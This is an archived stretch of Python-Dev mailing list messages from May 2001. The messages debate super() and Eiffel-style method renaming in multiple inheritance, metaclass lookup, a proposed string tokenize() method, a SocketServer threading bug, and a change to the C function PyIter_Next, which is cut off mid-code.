Message-ID: <200105031647.MAA25803@localhost.localdomain>

"Tim Peters" <tim.one at home.com> wrote,
> Given that we're using Python's search rules, the ambiguous point remaining
> is whether:
> 
>     super.f()
> 
> textually contained in a method of class K begins searching with:
> 
>     1) K.__bases__
> 
> or with:
> 
>     2) self.__class__.__bases__

It can only be 1.  Using 2 will only be correct if you are in a
method defined on a leaf class.  If not in a leaf, the search will
find the method you are already in... recursion is likely to terminate
in a stack overflow ;)

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido at digicool.com  Thu May  3 20:48:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:48:19 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
             <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com>


From guido at digicool.com  Thu May  3 20:50:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:50:30 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
             <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com>

> Pardon if this is brief and suggestive only, I am on deadlines.

No problem.  We appreciate it!

> Super is a mistaken concept in multiple inheritance languages. Fortunately,
> Python is not brain-damaged. Its multiple inheritance model can be fixed
> easily to be fully capable.
> 
> Here is a suggestive example of implementing the Eiffel model (the only one
> that is theoretically sound) using "pretend" Python syntax (keyword
> conservationists might like "import" where I have "rename"):
> 
> 
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):
>     def foo (self):
>         self._sfoo()
>         myfoostuff

Nice!  This is similar to Jeremy's favorite way of spelling "super":

class X(Y):
    Yfoo = Y.foo
    def foo(self):
        self.Yfoo()
        myfoostuff
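Jeremy's aliasing trick also covers the second case in Paul's message (D inherits from B and C, both derived from A, with a1 redefined only in B). A runnable Python 3 sketch with illustrative method bodies; unlike an Eiffel rename, the original name a1 stays visible on D:

```python
class A:
    def a1(self):
        return "A.a1"

class B(A):
    def a1(self):
        return "B.a1"

class C(A):
    pass            # inherits A.a1 unchanged

class D(B, C):
    # Class-level aliases approximate "B rename a1 as ba1,
    # C rename a1 as ca1": each name is bound to whatever a1
    # resolves to on that particular base.
    ba1 = B.a1
    ca1 = C.a1

d = D()
print(d.ba1())   # B.a1
print(d.ca1())   # A.a1
print(d.a1())    # B.a1
```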

> Suppose D inherits from B and C, which both inherit from A.
> A has a method a1 that is redefined in B but not in C.
> D wishes to use both A's version as inherited via C and B's version.
> 
> class D (B rename a1 as ba1, C rename a1 as ca1):
> 
>      can now use self.ca1, self.a1
> 
> Renaming is also useful where you inherit from a utility class and the lingo
> is different in the class where you want to use it. E.g. class Window (Tree
> rename children as subWindows)
> 
> Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.

Yes.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler at inetnebr.com  Thu May  3 20:17:16 2001
From: jepler at inetnebr.com (Jeff Epler)
Date: Thu, 3 May 2001 13:17:16 -0500
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010503131714.D21814@inetnebr.com>

On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Why not let us spell this as:
	class X(Y):
		from Y import foo as _sfoo, bar as _sbar
		...

Of course, then you can spell inheritance as
	class X:
		from Y import *
Right?  :)

Jeff


From nas at python.ca  Thu May  3 21:05:37 2001
From: nas at python.ca (Neil Schemenauer)
Date: Thu, 3 May 2001 12:05:37 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com>
Message-ID: <20010503120537.A13708@glacier.fnational.com>

Jeff Epler wrote:
> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):
> 
> Why not let us spell this as:
> 	class X(Y):
> 		from Y import foo as _sfoo, bar as _sbar
> 		...

This already has a meaning in Python.  Paul's suggested syntax is
pretty neat, IMHO.

  Neil


From trentm at ActiveState.com  Thu May  3 21:39:27 2001
From: trentm at ActiveState.com (Trent Mick)
Date: Thu, 3 May 2001 12:39:27 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com>
Message-ID: <20010503123927.B30837@ActiveState.com>

On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote:
> Jeff Epler wrote:
> > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > > class X (Y rename foo as _sfoo,
> > >                   bar as _sbar
> > >         ):
> > 
> > Why not let us spell this as:
> > 	class X(Y):
> > 		from Y import foo as _sfoo, bar as _sbar
> > 		...
> 
> This already has a meaning in Python.  Paul's suggested syntax is
> pretty neat, IMHO.

Ditto, but how do you separate the "rename" lists for multiple inheritance?

    class X (Y rename foo as _sfoo, bar as _sbar; Z):
                                                ^---- what to use here
        pass

How about:

    class X(Y, Z):
        from Y inherit foo as _yfoo, bar as _ybar
        from Z inherit foo as _zfoo, bar as _zbar


Hmmmmm. Don't know if I like that either. Just throwing out ideas.
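For comparison, here is a rough sketch of how per-base aliases can already be spelled in current Python (3.x) without new syntax. Plain assignments in the class body bind each base's function under a new name, so no separator between rename lists is needed. Y, Z, X, foo and bar are the thread's placeholder names; the method bodies are made up for illustration.

```python
class Y:
    def foo(self):
        return "Y.foo"

    def bar(self):
        return "Y.bar"


class Z:
    def foo(self):
        return "Z.foo"

    def bar(self):
        return "Z.bar"


class X(Y, Z):
    # Plain assignments in the class body give each base's version a private alias.
    _yfoo, _ybar = Y.foo, Y.bar
    _zfoo, _zbar = Z.foo, Z.bar

    def foo(self):
        # Override foo, but combine both inherited versions explicitly.
        return "X.foo(" + self._yfoo() + ", " + self._zfoo() + ")"


x = X()
print(x.foo())  # X.foo(Y.foo, Z.foo)
print(x.bar())  # Y.bar  (Y comes before Z in the MRO)
```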

Trent

-- 
Trent Mick
TrentM at ActiveState.com


From greg at cosc.canterbury.ac.nz  Fri May  4 06:25:08 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:25:08 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF1827E.E730F5DE@lemburg.com>
Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> I think it has to do with terminology: when I say "inherit"
> I actually mean "the lookup is forwarded to another object".

Some OO languages munge together the instance and inheritance
relationships, but Python isn't one of them. Using terminology
that way in the context of Python is guaranteed to cause
massive confusion!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Fri May  4 06:58:20 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:58:20 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>
Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz>

pf at artcom-gmbh.de (Peter Funk):

> * People will confuse this with calling
> MyBaseClass.__getitem__(....)

Given type/class/instance unification, that's exactly how it'll
be implemented. So it's not confusion, it's insightful understanding!
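A small illustration of the explicit base-class call Peter mentions, next to the super() spelling that later Python versions added. MyBaseClass, ExplicitDerived and SuperDerived are hypothetical names, and this is current Python 3 rather than 2001-era semantics.

```python
class MyBaseClass:
    def __getitem__(self, key):
        return "base:" + str(key)


class ExplicitDerived(MyBaseClass):
    def __getitem__(self, key):
        # Name the base class and pass self explicitly.
        return MyBaseClass.__getitem__(self, key).upper()


class SuperDerived(MyBaseClass):
    def __getitem__(self, key):
        # super() finds the next __getitem__ along the MRO instead.
        return super().__getitem__(key).upper()


print(ExplicitDerived()["k"])  # BASE:K
print(SuperDerived()["k"])     # BASE:K
```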

> This '::' operator is not at all that ugly

Well, that's a matter of opinion. But I'll concede that it's
less ugly than something like @ or $.

But in any case, it's not going to mean quite the same thing
in Python as it does in C++, so it might just confuse C++
people.

What exactly *is* it going to mean in Python, anyway?
Will it have a corresponding __magic__ method, and if so,
what will it be called?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From mal at lemburg.com  Fri May  4 10:40:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 10:40:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF26AF1.780462E2@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > I think it has to do with terminology: when I say "inherit"
> > I actually mean "the lookup is forwarded to another object".
> 
> Some OO languages munge together the instance and inheritance
> relationships, but Python isn't one of them. Using terminology
> that way in the context of Python is guaranteed to cause
> massive confusion!

But that's exactly what I am trying to do here: separate the
notion of how lookups work (inheritance) from how objects are 
created (instantiation) !

In Python, instantiation binds the new object to the creating
class and all failing lookups are directed from the object to
the class. 

OTOH, the class - base-class lookup relationship 
doesn't have anything to do with the creation of objects -- classes
are simply bound to their base-classes per definition of the
class in the sense that failing lookups are directed to the
base-classes.
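A deliberately simplified Python 3 sketch of the lookup chain just described: the instance's own namespace first, then its class, then the base classes in method resolution order. It ignores descriptors, __getattr__ and __slots__ (so functions come back unbound). lookup() is a hypothetical helper, not how CPython is actually written.

```python
def lookup(obj, name):
    """Simplified model of attribute lookup on an ordinary instance."""
    # 1. The object's own namespace.
    instance_dict = getattr(obj, "__dict__", {})
    if name in instance_dict:
        return instance_dict[name]
    # 2. Failing lookups go to the class, then to the base classes (MRO order).
    for klass in type(obj).__mro__:
        if name in klass.__dict__:
            return klass.__dict__[name]
    raise AttributeError(name)


class Base:
    x = "from Base"


class Derived(Base):
    y = "from Derived"


d = Derived()
d.z = "from the instance"
print(lookup(d, "z"), lookup(d, "y"), lookup(d, "x"))
```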

Classes themselves are created by meta-classes. The lookup
strategy between the two is defined by the meta-class.

What I'm arguing for is that meta-classes should get complete
control over how lookups and object creation are done. However,
this will only be possible by breaking the current automatic
lookup scheme at the meta-class - class boundary since otherwise
you'd run into endless loops during lookups (e.g. for many of
the __xxx__ methods).
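In today's Python (3.x), a metaclass can already intercept failing lookups on the class object, and the boundary described above is visible. Instances consult their class and its bases, never the metaclass. Meta and C are hypothetical names in this sketch.

```python
class Meta(type):
    def __getattr__(cls, name):
        # Only called when normal lookup on the class object itself fails.
        if name.startswith("__"):
            raise AttributeError(name)  # leave special names alone
        return f"{cls.__name__}.{name} supplied by the metaclass"


class C(metaclass=Meta):
    pass


print(C.anything)  # C.anything supplied by the metaclass

try:
    C().anything  # instance lookup checks the instance, C and object, not Meta
except AttributeError:
    print("instances do not consult the metaclass")
```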

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May  4 11:04:08 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 11:04:08 +0200
Subject: [Python-Dev] "".tokenize() ?
Message-ID: <3AF27088.DE495210@lemburg.com>

Gustavo Niemeyer submitted a patch which adds a tokenize like
method to strings and Unicode:

"one, two and three".tokenize([",", "and"])
-> ["one", " two ", "three"]

I like this method -- should I review the code and then check it in ?

PS: Haven't gotten any response regarding the .decode() method yet...
should I take this as "no objections" ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Fri May  4 11:57:19 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 11:57:19 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff>

mal wrote:


> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1.  method bloat.  not exactly something you do every day, and
when you do, it's a one-liner:

import re

def tokenize(string, ignore):
    return [word for word in re.findall(r"\w+", string) if word not in ignore]

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

-0.  method bloat.  we don't have asfloat methods on integers and
asint methods on strings either...

Cheers /F


From mal at lemburg.com  Fri May  4 12:16:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 12:16:16 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff>
Message-ID: <3AF28170.399C2A5@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1.  method bloat.  not exactly something you do every day, and
> when you do, it's a one-liner:
> 
> def tokenize(string, ignore):
>     return [word for word in re.findall(r"\w+", string) if word not in ignore]

This is not the same as what .tokenize() does: it cuts at each
occurrence of a substring rather than at words as in your example
(although I must say that list comprehension looks cool ;-).
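To make the distinction concrete, here is a quick Python 3 comparison of the two readings on a made-up input. The first is the word-based one-liner (with a return added); the second cuts at every separator substring.

```python
import re

text = "salt, pepper and olive oil"
seps = [",", "and"]

# Word-based: pull out runs of word characters, then drop the unwanted ones.
words = [w for w in re.findall(r"\w+", text) if w not in seps]
print(words)   # ['salt', 'pepper', 'olive', 'oil']

# Substring-based: cut at every occurrence of any separator, keeping the rest verbatim.
pieces = re.split("|".join(map(re.escape, seps)), text)
print(pieces)  # ['salt', ' pepper ', ' olive oil']
```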
 
> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> -0.  method bloat.  we don't have asfloat methods on integers and
> asint methods on strings either...

Well, we already have .encode() which interfaces to PyString_Encode(),
but no Python API for getting at PyString_Decode(). This is what
.decode() is for. Depending on the codecs you use, these two
methods can be very useful, e.g. for "fixing" line-endings or
hexifying strings. The codec concept can be used for far more
applications than just converting from and to Unicode.
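Here is a small sketch of the encode/decode symmetry being argued for, as it looks in today's Python 3. The str and bytes methods there are limited to text encodings, so bytes-to-bytes codecs such as "hex" are reached through codecs.encode() and codecs.decode(), which are exact inverses.

```python
import codecs

data = b"\x00\xffPy"

# "Hexifying" with a bytes-to-bytes codec, and undoing it with the matching decode.
hexed = codecs.encode(data, "hex")
print(hexed)  # b'00ff5079'

restored = codecs.decode(hexed, "hex")
print(restored == data)  # True
```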

About rich method APIs in general: I like having rich method APIs,
since they make life easier (you don't have to reinvent the wheel 
every time you want a common job to be done). IMHO, too many
methods can never hurt, but I'm probably alone with that POV.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Fri May  4 12:50:06 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 12:50:06 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com>
Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff>

mal wrote:

> > > "one, two and three".tokenize([",", "and"])
> > > -> ["one", " two ", "three"]
> > >
> > > I like this method -- should I review the code and then check it in ?
> >
> > -1.  method bloat.  not exactly something you do every day, and
> > when you do, it's a one-liner:
> >
> > def tokenize(string, ignore):
> >     return [word for word in re.findall(r"\w+", string) if word not in ignore]
>
> This is not the same as what .tokenize() does: it cuts at each
> occurrence of a substring rather than at words as in your example

oh, I didn't see the spaces.  splitting on all substrings is even
easier (but perhaps a bit more obscure, at least when written
on one line):

import re

def tokenize(string, seps):
    return re.split("|".join(map(re.escape, seps)), string)
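Here is a slightly more defensive Python 3 variant of that one-liner, offered as a sketch. re.escape keeps separators such as "." or "|" literal. Trying longer separators first stops a short separator from winning when it is a prefix of a longer one. The sketch assumes seps is non-empty; an empty pattern would split at every position.

```python
import re


def tokenize(string, seps):
    # Longer separators first, so "and" beats a bare "a" at the same position.
    ordered = sorted(seps, key=len, reverse=True)
    # re.escape makes each separator match literally.
    pattern = "|".join(map(re.escape, ordered))
    return re.split(pattern, string)


print(tokenize("one, two and three", [",", "and"]))  # ['one', ' two ', ' three']
print(tokenize("x and y", ["a", "and"]))             # ['x ', ' y']
print(tokenize("1.5|2", [".", "|"]))                 # ['1', '5', '2']
```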

Cheers /F


From lkcl at samba-tng.org  Fri May  4 13:31:29 2001
From: lkcl at samba-tng.org (Luke Kenneth Casson Leighton)
Date: Fri, 4 May 2001 13:31:29 +0200
Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn]
Message-ID: <20010504133129.K26116@angua.rince.de>

hi there,

i thought it best to bring this to someone's attention.

the forkingmixin code keeps track of its children, plus
because it forks, there's no close_request() to interfere
with the operation of the child etc. etc.

now, for some marginally bizarre reason, adding an
extra base class - BaseServer - has, i believe (without
proof, just a hunch), caused a bug in ThreadingMixIn to be
more likely to occur.

now, i wrote BaseServer in order to be able to overload
this for a server that reads from a SQL server table
and performs actions based on what it reads from there
(the name of a host and the name of a python script to
action on the host, from the database :) :)

... but i don't do threading.  python is my first
actual exposure to thread programming.  does anyone
have enough experience with threads to write something
in fewer lines and less time than this message?

all best,

luke

----- Forwarded message from noreply at sourceforge.net -----

Delivered-To: lkcl at angua.rince.de
Delivered-To: lkcl at samba.org
To: noreply at sourceforge.net
From: noreply at sourceforge.net
Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn
Date: Thu, 03 May 2001 16:26:12 -0700

Bugs item #417845, was updated on 2001-04-21 08:28
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470

Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Nobody/Anonymous (nobody)
Assigned to: Guido van Rossum (gvanrossum)
Summary: Python 2.1: SocketServer.ThreadingMixIn

Initial Comment:
SocketServer.ThreadingMixIn does not work properly
since it tries to close the socket of a request two
times.
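For reference, here is a minimal sketch against the modern socketserver module (Python 3.6+ for using a server in a with-statement), not the 2.1 code in the bug. In current versions, ThreadingMixIn.process_request() only starts a worker thread. That thread finishes the request and then closes it itself, so each request socket has a single owner and is closed once. UpperHandler and demo() are hypothetical names.

```python
import socket
import socketserver
import threading


class UpperHandler(socketserver.StreamRequestHandler):
    def handle(self):
        # Read one line from the client and echo it back upper-cased.
        line = self.rfile.readline()
        self.wfile.write(line.upper())


def demo():
    # Port 0 asks the OS for any free port; server_address reports the real one.
    with socketserver.ThreadingTCPServer(("127.0.0.1", 0), UpperHandler) as server:
        thread = threading.Thread(target=server.serve_forever, daemon=True)
        thread.start()
        try:
            with socket.create_connection(server.server_address) as conn:
                conn.sendall(b"hello\n")
                with conn.makefile("rb") as reader:
                    reply = reader.readline()
        finally:
            # Stop serve_forever(); leaving the with-block then closes the listener.
            server.shutdown()
    return reply


print(demo())  # b'HELLO\n'
```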


From gward at python.net  Fri May  4 20:12:44 2001
From: gward at python.net (Greg Ward)
Date: Fri, 4 May 2001 14:12:44 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010504141244.A1167@gerg.ca>

On 03 May 2001, Paul F. Dubois said:
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Maybe I'm being thick, but don't you get the same effect by doing this:

class X (Y):
    _sfoo = Y.foo
    _sbar = Y.bar

...or would the "rename" syntax also hide the "foo" and "bar" names from
X's effective namespace[1]?  In that case, I guess some special syntax
is needed.

[1] "effective namespace" -- the union of X's class dict with all its
superclasses' dicts; not actually X's namespace, but the set of names you
can use in X.  I think.  Err, whatever.
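Here is a quick check of that idea in current Python 3, where Y.foo is just the plain function, as a sketch. The alias works, but it does not hide foo, which is exactly the open question above. Class and method bodies are made up.

```python
class Y:
    def foo(self):
        return "Y.foo"


class X(Y):
    _sfoo = Y.foo  # alias stored in X's class dict

    def foo(self):
        return "X.foo wrapping " + self._sfoo()


x = X()
print(x.foo())           # X.foo wrapping Y.foo
print(X._sfoo is Y.foo)  # True: the alias is the same function object
print("foo" in dir(x))   # True: aliasing leaves the original name visible
```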

        Greg


From gward at python.net  Fri May  4 20:15:51 2001
From: gward at python.net (Greg Ward)
Date: Fri, 4 May 2001 14:15:51 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <20010504141551.B1167@gerg.ca>

On 04 May 2001, M.-A. Lemburg said:
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
> 
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
> 
> I like this method -- should I review the code and then check it in ?

I concur with /F: -1 because you can do it easily with re.split().

        Greg
-- 
Greg Ward - Unix bigot                                  gward at python.net
http://starship.python.net/~gward/
I hope something GOOD came in the mail today so I have a REASON to live!!


From guido at digicool.com  Fri May  4 20:36:14 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:36:14 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT."
             <20010504141244.A1167@gerg.ca> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>  
            <20010504141244.A1167@gerg.ca> 
Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com>

> On 03 May 2001, Paul F. Dubois said:
> > 1. The simple case, X inherits from Y and in defining foo and bar needs to
> > use Y's version:
> > 
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):

[Greg Ward]
> Maybe I'm being thick, but don't you get the same effect by doing this:
> 
> class X (Y):
>     _sfoo = Y.foo
>     _sbar = Y.bar
> 
> ...or would the "rename" syntax also hide the "foo" and "bar" names from
> X's effective namespace[1]?  In that case, I guess some special syntax
> is needed.

Paul's point is that the rename thing makes it possible to deprecate
the form Y.foo, which is causing the basic ambiguity here.

> [1] "effective namespace" -- the union of X's class dict with all its
> superclasses' dicts; not actually X's namespace, but the set of names you
> can use in X.  I think.  Err, whatever.

Probably irrelevant.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Fri May  4 20:38:06 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:38:06 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT."
             <20010504141551.B1167@gerg.ca> 
References: <3AF27088.DE495210@lemburg.com>  
            <20010504141551.B1167@gerg.ca> 
Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com>

> On 04 May 2001, M.-A. Lemburg said:
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> > 
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> > 
> > I like this method -- should I review the code and then check it in ?
> 
> I concur with /F: -1 because you can do it easily with re.split().

-1 also.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May  4 20:51:26 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 14:51:26 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>

[MAL]
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1 here.  Easily enough done via other means, and you just *know* different
people will want different variants of tokenization (e.g., nobody in their
right mind will want " two " coming back from that example, and, given that
it does, that it doesn't also return " three" is baffling).
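To illustrate the point about variants, here is one plausible alternative in Python 3. It strips whitespace and drops empty pieces, which seems closer to what the example output wants. tokenize_stripped() is a hypothetical name.

```python
import re


def tokenize_stripped(string, seps):
    pattern = "|".join(map(re.escape, sorted(seps, key=len, reverse=True)))
    # Strip each piece and drop pieces that are empty after stripping.
    return [piece.strip() for piece in re.split(pattern, string) if piece.strip()]


print(tokenize_stripped("one, two and three", [",", "and"]))  # ['one', 'two', 'three']
print(tokenize_stripped("a,,b", [","]))                       # ['a', 'b']
```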

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

+1 from me:  it's the other half of the existing .encode() method, and the
current lack of symmetry is icky.


From barry at digicool.com  Fri May  4 20:57:09 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Fri, 4 May 2001 14:57:09 -0400
Subject: [Python-Dev] Multiple inheritance
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
	<20010503131714.D21814@inetnebr.com>
Message-ID: <15090.64389.746625.331215@anthem.wooz.org>

>>>>> "JE" == Jeff Epler <jepler at inetnebr.com> writes:

    >> class X (Y rename foo as _sfoo, bar as _sbar ):

    | Why not let us spell this as:
    | 	class X(Y):
    | 		from Y import foo as _sfoo, bar as _sbar
    | 		...

>>>>> "NS" == Neil Schemenauer <nas at python.ca> writes:

    NS> This already has a meaning in Python.  Paul's suggested syntax
    NS> is pretty neat, IMHO.

Not if Y is a class though, right?  That would currently raise an
ImportError, so why not hijack it for this purpose?  I think it has a
natural and clear enough meaning without requiring additional
keywords, or complicating the base class specification syntax.
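Barry's premise is easy to check in today's Python 3, sketched below. The import statement ignores the class named Y that is in scope and looks for a module called Y. So, assuming no such module is importable, it fails with ModuleNotFoundError, a subclass of ImportError. SOURCE and try_class_body_import() are hypothetical names.

```python
SOURCE = '''
class Y:
    def foo(self):
        return "Y.foo"

class X(Y):
    from Y import foo as _sfoo
'''


def try_class_body_import():
    """Run SOURCE and return the ImportError it raises, or None."""
    try:
        exec(SOURCE, {"__name__": "demo"})
    except ImportError as exc:  # ModuleNotFoundError subclasses ImportError
        return exc
    return None


print(repr(try_class_body_import()))
```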

-Barry


From tim.one at home.com  Fri May  4 22:50:03 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 16:50:03 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>

In spare moments, I've been plugging away at making various functions work
nicely with iterators (map, min, max, etc).

Over and over this requires writing code of the form:

	op2 = PyIter_Next(it);
	if (op2 == NULL) {
		/* StopIteration is *implied* by a NULL return from
		 * PyIter_Next() if PyErr_Occurred() is false.
		 */
		if (PyErr_Occurred()) {
			if (PyErr_ExceptionMatches(PyExc_StopIteration))
				PyErr_Clear();
			else
				goto Fail;
		}
		break;
	}

This is wordy, obscure, and in my experience is needed every time I call
PyIter_Next().

So I'd like to hide this in PyIter_Next instead, like so:

/* Return next item.
 * If an error occurs, return NULL and set *error=1.
 * If the iteration terminated normally, return NULL and set *error=0.
 * Else return the next object and set *error=0.
 */
PyObject *
PyIter_Next(PyObject *iter, int *error)
{
	PyObject *result;
	if (!PyIter_Check(iter)) {
		PyErr_Format(PyExc_TypeError,
			     "'%.100s' object is not an iterator",
			     iter->ob_type->tp_name);
		*error = 1;
		return NULL;
	}
	result = (*iter->ob_type->tp_iternext)(iter);
	*error = 0;
	if (result)
		return result;
	if (PyErr_Occurred()) {
		if (PyErr_ExceptionMatches(PyExc_StopIteration))
			PyErr_Clear();
		else
			*error = 1;
	}
